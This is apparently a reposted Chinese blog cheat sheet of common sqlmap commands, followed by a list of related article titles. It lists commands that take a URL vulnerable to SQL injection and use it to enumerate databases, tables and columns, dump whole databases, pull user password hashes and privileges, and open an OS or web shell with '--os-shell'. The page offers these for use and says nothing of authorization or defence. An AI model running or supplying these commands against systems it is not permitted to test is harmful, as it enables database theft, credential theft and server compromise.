sqlmap常用语句

Posted Windows 10

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap常用语句相关的知识,希望对你有一定的参考价值。

1.查看数据库:  sqlmap.py -u 存在注入的URL地址 --dbs  sqlmap.py -u "" --dbs

2.接下来查看表名:  sqlmap.py -u 存在注入的URL地址 -D 数据库名 --tables  sqlmap.py -u "" -D "" --tables

3.查看字段:  sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 --columns  sqlmap.py -u "" -D "" -T "" --columns

4.爆字段内容  sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 -C 列名 --dump  sqlmap.py -u "" -D "" -T "" -C "" --dump

5.脱库 sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 -C 列名1,列名2 --dump --

threads=10 --start=1 --stop=3  sqlmap.py -u "" -D "" -T "" -C "","" --dump --threads=10 --start=1 --stop=3

python sqlmap.py.py -u 注入地址 --is-dba   判断当前用户是不是DBA

python sqlmap.py.py -u 注入地址 --users    查看当前用户

python sqlmap.py.py -u 注入地址 --passwords 查看密码

python sqlmap.py.py -u 注入地址 --privileges 查看权限

python sqlmap.py.py -u 注入地址 --os-shell  写web shell

以上是关于sqlmap常用语句的主要内容,如果未能解决你的问题,请参考以下文章

sqlmap使用过程中的常用命令

SQL注入原理和Sqlmap常用指令

sqlmap爆库名时选择的注入方式

sqlmap 命令详解(自备速查)

关于拼接SQL语句sqlMap的使用方法

SqlMap常用参数